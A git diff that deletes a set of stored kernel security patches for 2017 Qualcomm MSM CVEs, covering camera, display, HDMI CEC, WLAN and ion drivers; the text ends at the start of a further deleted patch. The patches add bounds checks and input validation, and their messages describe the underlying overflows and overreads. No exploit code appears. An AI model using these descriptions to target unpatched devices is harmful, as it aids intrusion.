-the invalid slave_info is used by msm_sensor_driver_probe.
-This cause crash when ioctl VIDIOC_MSM_SENSOR_INIT_CFG repeatedly.
-
-Fix:
-1) avoid the same msm_sd_subdev added into the ordered_sd_list.
-2) enlarge the buffer size for i2c addr and data.
-
-Bug: 36492827
-Change-Id: Idffcd3b82b9590dbfdcaf14b80668cc894178f54
-Signed-off-by: Haibin Liu
----
- drivers/media/platform/msm/camera_v2/msm.c | 5 +++++
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c | 5 +++--
- .../msm/camera_v2/sensor/msm_sensor_driver.c | 25 ++++++++++++++--------
- 3 files changed, 24 insertions(+), 11 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/msm.c b/drivers/media/platform/msm/camera_v2/msm.c
-index e517f0f589ce6..47ba2f99dd001 100644
---- a/drivers/media/platform/msm/camera_v2/msm.c
-+++ b/drivers/media/platform/msm/camera_v2/msm.c
-@@ -334,6 +334,11 @@ static void msm_add_sd_in_position(struct msm_sd_subdev *msm_subdev,
- struct msm_sd_subdev *temp_sd;
-
- list_for_each_entry(temp_sd, sd_list, list) {
-+ if (temp_sd == msm_subdev) {
-+ pr_err("%s :Fail to add the same sd %d\n",
-+ __func__, __LINE__);
-+ return;
-+ }
- if (msm_subdev->close_seq < temp_sd->close_seq) {
- list_add_tail(&msm_subdev->list, &temp_sd->list);
- return;
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 877021edc776d..4243005beff50 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -17,7 +17,8 @@
- #undef CDBG
- #define CDBG(fmt, args...) pr_debug(fmt, ##args)
- #define S_I2C_DBG(fmt, args...)
pr_debug(fmt, ##args)
--
-+#define MAX_I2C_ADDR_TYPE_SIZE (MSM_CAMERA_I2C_3B_ADDR + 1)
-+#define MAX_I2C_DATA_TYPE_SIZE (MSM_CAMERA_I2C_SET_BYTE_WRITE_MASK_DATA + 1)
- #define I2C_COMPARE_MATCH 0
- #define I2C_COMPARE_MISMATCH 1
- #define I2C_POLL_MAX_ITERATION 20
-@@ -27,7 +28,7 @@ int32_t msm_camera_cci_i2c_read(struct msm_camera_i2c_client *client,
- enum msm_camera_i2c_data_type data_type)
- {
- int32_t rc = -EFAULT;
-- unsigned char buf[client->addr_type+data_type];
-+ unsigned char buf[MAX_I2C_ADDR_TYPE_SIZE + MAX_I2C_DATA_TYPE_SIZE];
- struct msm_camera_cci_ctrl cci_ctrl;
-
- if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-index 5d3c56191e0d4..bd376ffa28c10 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/msm_sensor_driver.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2015,2017 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -103,7 +103,11 @@ static int32_t msm_sensor_driver_create_i2c_v4l_subdev
- s_ctrl->msm_sd.sd.entity.name = s_ctrl->msm_sd.sd.name;
- s_ctrl->sensordata->sensor_info->session_id = session_id;
- s_ctrl->msm_sd.close_seq = MSM_SD_CLOSE_2ND_CATEGORY | 0x3;
-- msm_sd_register(&s_ctrl->msm_sd);
-+ rc = msm_sd_register(&s_ctrl->msm_sd);
-+ if (rc < 0) {
-+ pr_err("failed: msm_sd_register rc %d", rc);
-+ return rc;
-+ }
- CDBG("%s:%d\n", __func__, __LINE__);
- return rc;
- }
-@@ -133,7 +137,11 @@ static int32_t msm_sensor_driver_create_v4l_subdev
- s_ctrl->msm_sd.sd.entity.group_id = MSM_CAMERA_SUBDEV_SENSOR;
- s_ctrl->msm_sd.sd.entity.name = s_ctrl->msm_sd.sd.name;
- s_ctrl->msm_sd.close_seq = MSM_SD_CLOSE_2ND_CATEGORY | 0x3;
-- msm_sd_register(&s_ctrl->msm_sd);
-+ rc = msm_sd_register(&s_ctrl->msm_sd);
-+ if (rc < 0) {
-+ pr_err("failed: msm_sd_register rc %d", rc);
-+ return rc;
-+ }
- msm_sensor_v4l2_subdev_fops = v4l2_subdev_fops;
- #ifdef CONFIG_COMPAT
- msm_sensor_v4l2_subdev_fops.compat_ioctl32 =
-@@ -885,12 +893,6 @@ int32_t msm_sensor_driver_probe(void *setting,
-
- pr_err("%s probe succeeded", slave_info->sensor_name);
-
-- /*
-- Set probe succeeded flag to 1 so that no other camera shall
-- * probed on this slot
-- */
-- s_ctrl->is_probe_succeed = 1;
--
- /*
- * Update the subdevice id of flash-src based on availability in kernel.
- */
-@@ -940,6 +942,11 @@ int32_t msm_sensor_driver_probe(void *setting,
-
- msm_sensor_fill_sensor_info(s_ctrl, probed_info, entity_name);
-
-+ /*
-+ * Set probe succeeded flag to 1 so that no other camera shall
-+ * probed on this slot
-+ */
-+ s_ctrl->is_probe_succeed = 1;
- return rc;
-
- camera_power_down:
diff --git a/Patches/Linux_CVEs/CVE-2017-9706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9706/ANY/0001.patch
deleted file mode 100644
index 9735e70c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9706/ANY/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 7489a0a8f68d0f018d0f9df5df157bb20f83b05e Mon Sep 17 00:00:00 2001
-From: Bharath Gopal
-Date: Fri, 4 Aug 2017 17:19:24 -0700
-Subject: [PATCH] msm: mdss: Buffer overflow while processing gamut table data
-
-Modified the size of the gamut table data-structure in order to
-avoid a buffer overflow while copying data from user-space.
-
-Bug: 34170483
-Change-Id: I8c5fa1caff450a2d25d7859bd159ab4a60045e54
-Signed-off-by: Bharath Gopal
----
- drivers/video/msm/mdss/mdss_mdp_pp.c | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index bd6d2fbd9c26e..a666f4c61d1ab 100644
---- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -389,7 +389,7 @@ struct mdss_pp_res_type {
- struct mdp_hist_lut_data enhist_disp_cfg[MDSS_BLOCK_DISP_NUM];
- struct mdp_dither_cfg_data dither_disp_cfg[MDSS_BLOCK_DISP_NUM];
- struct mdp_gamut_cfg_data gamut_disp_cfg[MDSS_BLOCK_DISP_NUM];
-- uint16_t gamut_tbl[MDSS_BLOCK_DISP_NUM][GAMUT_TOTAL_TABLE_SIZE];
-+ uint16_t gamut_tbl[MDSS_BLOCK_DISP_NUM][GAMUT_TOTAL_TABLE_SIZE * 3];
- u32 hist_data[MDSS_BLOCK_DISP_NUM][HIST_V_SIZE];
- struct pp_sts_type pp_disp_sts[MDSS_MAX_MIXER_DISP_NUM];
- /* physical info */
diff --git a/Patches/Linux_CVEs/CVE-2017-9714/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9714/qcacld-2.0/0001.patch
deleted file mode 100644
index 466dbd15..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9714/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From aae237dfbaf8edcf310eeb84b887b20e7e9c0ff3 Mon Sep 17 00:00:00 2001
-From: Kapil Gupta
-Date: Tue, 16 May 2017 12:39:54 +0530
-Subject: qcacld-2.0: Drop assoc request if RSNIE/WPAIE parsing fail
-
-Add changes to drop assoc request and return error if RSNIE or
-WPAIE parsing fail during parsing of assoc request.
-
-CRs-Fixed: 2046578
-Change-Id: I88d779399c2eba5d33c30144bf9600a1f3a00b77
----
- CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c | 23 +++++++++++++++++++----
- 1 file changed, 19 insertions(+), 4 deletions(-)
-
-diff --git a/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c b/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c
-index 7aa5464..23d2cf3 100644
---- a/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c
-+++ b/CORE/MAC/src/pe/lim/limProcessAssocReqFrame.c
-@@ -752,10 +752,18 @@ limProcessAssocReqFrame(tpAniSirGlobal pMac, tANI_U8 *pRxPacketInfo,
- if(pAssocReq->rsn.length)
- {
- // Unpack the RSN IE
-- dot11fUnpackIeRSN(pMac,
-+ if (dot11fUnpackIeRSN(pMac,
- &pAssocReq->rsn.info[0],
- pAssocReq->rsn.length,
-- &Dot11fIERSN);
-+ &Dot11fIERSN) != DOT11F_PARSE_SUCCESS)
-+ {
-+ limLog(pMac, LOG1,
-+ FL("Invalid RSNIE received"));
-+ limSendAssocRspMgmtFrame(pMac,
-+ eSIR_MAC_INVALID_RSN_IE_CAPABILITIES_STATUS,
-+ 1, pHdr->sa, subType, 0,psessionEntry);
-+ goto error;
-+ }
-
- /* Check RSN version is supported or not */
- if(SIR_MAC_OUI_VERSION_1 == Dot11fIERSN.version)
-@@ -821,10 +829,17 @@ limProcessAssocReqFrame(tpAniSirGlobal pMac, tANI_U8 *pRxPacketInfo,
- // Unpack the WPA IE
- if(pAssocReq->wpa.length)
- {
-- dot11fUnpackIeWPA(pMac,
-+ if (dot11fUnpackIeWPA(pMac,
- &pAssocReq->wpa.info[4], //OUI is not taken care
- pAssocReq->wpa.length,
-- &Dot11fIEWPA);
-+ &Dot11fIEWPA) != DOT11F_PARSE_SUCCESS)
-+ {
-+ limLog(pMac, LOGE, FL("Invalid WPA IE"));
-+ limSendAssocRspMgmtFrame(pMac,
-+ eSIR_MAC_INVALID_INFORMATION_ELEMENT_STATUS,
-+ 1, pHdr->sa, subType, 0,psessionEntry);
-+ goto error;
-+ }
- /* check the groupwise and pairwise cipher
suites */
- if(eSIR_SUCCESS != (status = limCheckRxWPAIeMatch(pMac, Dot11fIEWPA, psessionEntry, pAssocReq->HTCaps.present)))
- {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9715/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9715/qcacld-2.0/0001.patch
deleted file mode 100644
index 03c5244b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9715/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From 58350a7bcb827c0ac81f0750a62d5c5a8ed3a469 Mon Sep 17 00:00:00 2001
-From: Jeff Johnson
-Date: Tue, 6 Jun 2017 08:56:33 -0700
-Subject: qcacld-2.0: Avoid extscan bucket spec overread
-
-Currently in hdd_extscan_start_fill_bucket_channel_spec() the
-QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC attribute is parsed without
-specifying a policy. This means that no policy is enforced.
-Subsequently the values of the nested attributes are retrieved, but
-again without any length limits enforced. This could result in a
-buffer overread.
-To prevent this issue:
-* Parse using the existing policy wlan_hdd_extscan_config_policy
-* Update the policy to add missing attributes
-
-Change-Id: I3b20cb28d1beccd2e804b022b531413ad1edb533
-CRs-Fixed: 2057034
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 1f6be81..078b4fd 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -850,6 +850,9 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_LOST_AP_SAMPLE_SIZE] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_MIN_BREACHING] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SIGNIFICANT_CHANGE_PARAMS_NUM_AP] = { .type = NLA_U32 },
-+ [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_MAX_PERIOD] = { .type = NLA_U32 },
-+ [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_BASE] = { .type = NLA_U32 },
-+ [QCA_WLAN_VENDOR_ATTR_EXTSCAN_BUCKET_SPEC_STEP_COUNT] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_THRESHOLD_PARAM_SSID] = { .type = NLA_BINARY,
- .len = IEEE80211_MAX_SSID_LEN + 1 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SSID_HOTLIST_PARAMS_LOST_SSID_SAMPLE_SIZE] = { .type = NLA_U32 },
-@@ -3533,8 +3536,9 @@ static int hdd_extscan_start_fill_bucket_channel_spec(
- }
-
- if
(nla_parse(bucket,
-- QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
-- nla_data(buckets), nla_len(buckets), NULL)) {
-+ QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_MAX,
-+ nla_data(buckets), nla_len(buckets),
-+ wlan_hdd_extscan_config_policy)) {
- hddLog(LOGE, FL("nla_parse failed"));
- return -EINVAL;
- }
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9717/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-9717/qcacld-2.0/0001.patch
deleted file mode 100644
index 606c231e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9717/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From bf7486fb6d82fb9ad02e303b6fdf4061cfc0375d Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga
-Date: Thu, 25 May 2017 15:53:53 +0530
-Subject: qcacld-2.0: Add get valid channels entry to NLA policy
-
-improper validation of
-QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_MAX_CHANNELS.
-
-validate QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_MAX_CHANNELS.
-
-CRs-Fixed: 2051450
-Change-Id: I16e5808492b5b35dc8b646af45d6ac6d65561804
----
- CORE/HDD/src/wlan_hdd_cfg80211.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg80211.c b/CORE/HDD/src/wlan_hdd_cfg80211.c
-index 837e407..9d18fd3 100644
---- a/CORE/HDD/src/wlan_hdd_cfg80211.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg80211.c
-@@ -822,6 +822,7 @@ wlan_hdd_extscan_config_policy[QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_
- {
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_SUBCMD_CONFIG_PARAM_REQUEST_ID] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_WIFI_BAND] = { .type = NLA_U32 },
-+ [QCA_WLAN_VENDOR_ATTR_EXTSCAN_GET_VALID_CHANNELS_CONFIG_PARAM_MAX_CHANNELS] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_CHANNEL] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_DWELL_TIME] = { .type = NLA_U32 },
- [QCA_WLAN_VENDOR_ATTR_EXTSCAN_CHANNEL_SPEC_PASSIVE] = { .type = NLA_U8 },
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9719/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-9719/3.18/0001.patch
deleted file mode 100644
index ed13eefa..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9719/3.18/0001.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From a491499c3490999555b7ccf8ad1a7d6455625807 Mon Sep 17 00:00:00 2001
-From: zhaoyuan
-Date: Mon, 20 Feb 2017 13:42:20 +0800
-Subject: msm: mdss: hdmi: check up-bound of CEC frame size
-
-the spec says the frame size will not be greater than
-14, but this have a security hole when somebody sends
-a message with a size greater than 14. So need check
-up-boud of the CEC frame size.
-
-Change-Id: I743208badc5e77ae911cfb2d102f758d4843138f
-Signed-off-by: zhaoyuan
----
- drivers/video/msm/mdss/mdss_hdmi_cec.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_cec.c b/drivers/video/msm/mdss/mdss_hdmi_cec.c
-index a424d98..a4ed012 100644
---- a/drivers/video/msm/mdss/mdss_hdmi_cec.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_cec.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -196,7 +196,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- msg.sender_id, msg.recvr_id,
- msg.frame_size);
-
-- if (msg.frame_size < 1) {
-+ if (msg.frame_size < 1 || msg.frame_size > MAX_CEC_FRAME_SIZE) {
- DEV_ERR("%s: invalid message (frame length = %d)\n",
- __func__, msg.frame_size);
- return;
-@@ -216,7 +216,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- msg.operand[i] = data & 0xFF;
- }
-
-- for (; i < 14; i++)
-+ for (; i < MAX_OPERAND_SIZE; i++)
- msg.operand[i] = 0;
-
- DEV_DBG("%s: opcode 0x%x, wakup_en %d, device_suspend %d\n", __func__,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9719/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-9719/4.4/0002.patch
deleted file mode 100644
index 3c4d99fe..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9719/4.4/0002.patch
+++ /dev/null
@@ -1,47 +0,0 @@
-From d815f54f15d765b5e0035a9d208d71567bcaace0 Mon Sep 17 00:00:00 2001
-From: zhaoyuan
-Date: Mon, 20 Feb 2017 13:42:20 +0800
-Subject: msm: mdss: hdmi: check up-bound of CEC frame size
-
-the spec says the frame size will not be greater than
-14, but this have a security hole when somebody sends
-a message with a size greater than 14. So need check
-up-boud of the CEC frame size.
-
-Change-Id: I743208badc5e77ae911cfb2d102f758d4843138f
-Signed-off-by: zhaoyuan
----
- drivers/video/fbdev/msm/mdss_hdmi_cec.c | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/video/fbdev/msm/mdss_hdmi_cec.c b/drivers/video/fbdev/msm/mdss_hdmi_cec.c
-index a424d98..a4ed012 100644
---- a/drivers/video/fbdev/msm/mdss_hdmi_cec.c
-+++ b/drivers/video/fbdev/msm/mdss_hdmi_cec.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -196,7 +196,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- msg.sender_id, msg.recvr_id,
- msg.frame_size);
-
-- if (msg.frame_size < 1) {
-+ if (msg.frame_size < 1 || msg.frame_size > MAX_CEC_FRAME_SIZE) {
- DEV_ERR("%s: invalid message (frame length = %d)\n",
- __func__, msg.frame_size);
- return;
-@@ -216,7 +216,7 @@ static void hdmi_cec_msg_recv(struct work_struct *work)
- msg.operand[i] = data & 0xFF;
- }
-
-- for (; i < 14; i++)
-+ for (; i < MAX_OPERAND_SIZE; i++)
- msg.operand[i] = 0;
-
- DEV_DBG("%s: opcode 0x%x, wakup_en %d, device_suspend %d\n", __func__,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9720/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9720/3.10/0001.patch
deleted file mode 100644
index ef6036d0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9720/3.10/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From c74dbab508c7c07d8e2cf8230cc78bff4b710272 Mon Sep 17 00:00:00 2001
-From: Fei Zhang
-Date: Wed, 17 May 2017 15:33:02 +0800
-Subject: msm:camera: correct stats query out of boundary
-
-fix one potential out of boundary query of stats info.
-
-Bug: 36264696
-Change-Id: I13e4bf8802fcce529f9268c272e4727619d5ad8f
-Signed-off-by: Fei Zhang
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-index a0eed95..82da3e0 100644
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -803,7 +803,7 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- update_info = &update_cmd->update_info[i];
- /*check array reference bounds*/
- if (STATS_IDX(update_info->stream_handle)
-- > vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+ >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
- pr_err("%s: stats idx %d out of bound!", __func__,
- STATS_IDX(update_info->stream_handle));
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-9720/3.18/0002.patch
deleted file mode 100644
index fbda8515..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0002.patch
+++ /dev/null
@@ -1,32 +0,0 @@
-From 737f415a5c637802786ec6d36288220cb4d3ae4d Mon Sep 17 00:00:00 2001
-From: Fei Zhang
-Date: Wed, 17 May 2017 14:14:54 +0800
-Subject: msm:camera: correct stats query out of boundary
-
-fix one potential out of boundary query of stats info.
-
-Change-Id: I13e4bf8802fcce529f9268c272e4727619d5ad8f
-Signed-off-by: Fei Zhang
----
- drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
- mode change 100644 => 100755 drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-
-diff --git a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-old mode 100644
-new mode 100755
-index d4d2c82..8d2d8e7
---- a/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/camera_v2/isp/msm_isp_stats_util.c
-@@ -885,7 +885,7 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- &update_cmd->update_info[i];
- /*check array reference bounds*/
- if (STATS_IDX(update_info->stream_handle)
-- > vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+ >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
- pr_err("%s: stats idx %d out of bound!", __func__,
- STATS_IDX(update_info->stream_handle));
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0003.patch b/Patches/Linux_CVEs/CVE-2017-9720/3.18/0003.patch
deleted file mode 100644
index 2b1f0f4c..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9720/3.18/0003.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From 2c5616295a5411812188f515d6ecf1984b9c1798 Mon Sep 17 00:00:00 2001
-From: Terence Ho
-Date: Wed, 14 Jun 2017 14:17:50 -0400
-Subject: msm:camera: correct stats query out of boundary
-
-fix one potential out of boundary query of stats info.
-
-Change-Id: Ic3224f2f08e6dd2bb05a846d0300df251f9fb192
-CRs-Fixed: 2041066
-Signed-off-by: Terence Ho
----
- drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c b/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c
-index feb4a62..1b24a13 100644
---- a/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c
-+++ b/drivers/media/platform/msm/ais/isp/msm_isp_stats_util.c
-@@ -890,7 +890,7 @@ int msm_isp_update_stats_stream(struct vfe_device *vfe_dev, void *arg)
- &update_cmd->update_info[i];
- /* check array reference bounds */
- if (STATS_IDX(update_info->stream_handle)
-- > vfe_dev->hw_info->stats_hw_info->num_stats_type) {
-+ >= vfe_dev->hw_info->stats_hw_info->num_stats_type) {
- pr_err("%s: stats idx %d out of bound!", __func__,
- STATS_IDX(update_info->stream_handle));
- return -EINVAL;
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9724/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-9724/ANY/0001.patch
deleted file mode 100644
index e613bef7..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9724/ANY/0001.patch
+++ /dev/null
@@ -1,69 +0,0 @@
-From 5328a92fa26eabe2ba259b1d813f9de488efc9ec Mon Sep 17 00:00:00 2001
-From: "Se Wang (Patrick) Oh"
-Date: Mon, 29 Jun 2015 11:43:39 -0700
-Subject: ion: Fix unprotected userspace access
-
-After enabling KASan, unprotected userspace access causes
-a PTE translation fault as it can covers only kernel memory
-region. Following is the crash error for the reference.
-
-Unable to handle kernel paging request at virtual address dfffff901ff64b84
-pgd = ffffffc083266000
-[dfffff901ff64b84] *pgd=0000000000000000, *pud=0000000000000000
-Internal error: Oops: 96000004 [#1] PREEMPT SMP
-Modules linked in:
-CPU: 1 PID: 8527 Comm: iveaudiolatency Tainted: G W 3.18.0-g5a4a5d5-07255-g8e80921-dirty #21
-Hardware name: Qualcomm Technologies, Inc. MSM 8996 v2 + PMI8994 MTP (DT)
-task: ffffffc02bfeb600 ti: ffffffc083378000 task.ti: ffffffc083378000
-PC is at compat_msm_ion_ioctl+0x23c/0x614
-LR is at compat_msm_ion_ioctl+0x1d8/0x614
-pc : [] lr : [] pstate: 80000145
-sp : ffffffc08337faf0
-x29: ffffffc08337faf0 x28: 0000000000000000
-x27: ffffffc083378000 x26: 00000000ffb25c20
-x25: 00000000e2fa6000 x24: 0000000000000000
-x23: 00000000ffb25c18 x22: 0000000000000000
-x21: ffffffc08fcaa640 x20: 00000000c0144d00
-x19: 00000000ffb25c74 x18: 0000000000000000
-x17: 0000000000000000 x16: ffffffc000385a88
-x15: 0000000000000000 x14: 00000000f73517c9
-x13: 00000000ffb25c30 x12: 0000000000000001
-x11: 00000000ffffffff x10: ffffff881066ff3a
-x9 : 1ffffff81066ff3a x8 : dfffff9000000000
-x7 : 0000000000000036 x6 : ffffffc08337f9d4
-x5 : 0000000000000003 x4 : 00000000ffb25c30
-x3 : ffffffc0012bd334 x2 : 0000000000000001
-x1 : 000000001ff64b84 x0 : dfffff9000000000
-
-Process iveaudiolatency (pid: 8527, stack limit = 0xffffffc083378058)
-Call trace:
-[] compat_msm_ion_ioctl+0x23c/0x614
-[] ion_ioctl+0x4dc/0x680
-[] compat_ion_ioctl+0xb98/0xbc0
-[] compat_SyS_ioctl+0x288/0x2048
-Code: 910022fa d2dff200 d343ff41 f2fbffe0 (38e06820)
----[ end trace 490ef1c3bde7b96c ]---
-coresight-tmc 3028000.tmc: TMC aborted
-
-Change-Id: I7595bbf5f311182d40f7158654df56dc8bcf672a
-Signed-off-by: Se Wang (Patrick) Oh
----
- drivers/staging/android/ion/msm/compat_msm_ion.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/staging/android/ion/msm/compat_msm_ion.c b/drivers/staging/android/ion/msm/compat_msm_ion.c
-index c34b3a7..ddb9fc7 100644
---- a/drivers/staging/android/ion/msm/compat_msm_ion.c
-+++ b/drivers/staging/android/ion/msm/compat_msm_ion.c
-@@ -58,7 +58,7 @@ static int compat_get_ion_flush_data(
- err |= put_user(i, &data->fd);
- err |= get_user(u, &data32->vaddr);
- /* upper bits won't get set, zero them */
-- data->vaddr = NULL;
-+ err |= put_user(NULL, &data->vaddr);
- err |= put_user(u, (compat_uptr_t *)&data->vaddr);
- err |= get_user(l, &data32->offset);
- err |= put_user(l, &data->offset);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-9725/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-9725/3.10/0001.patch
deleted file mode 100644
index d34ee8d6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-9725/3.10/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
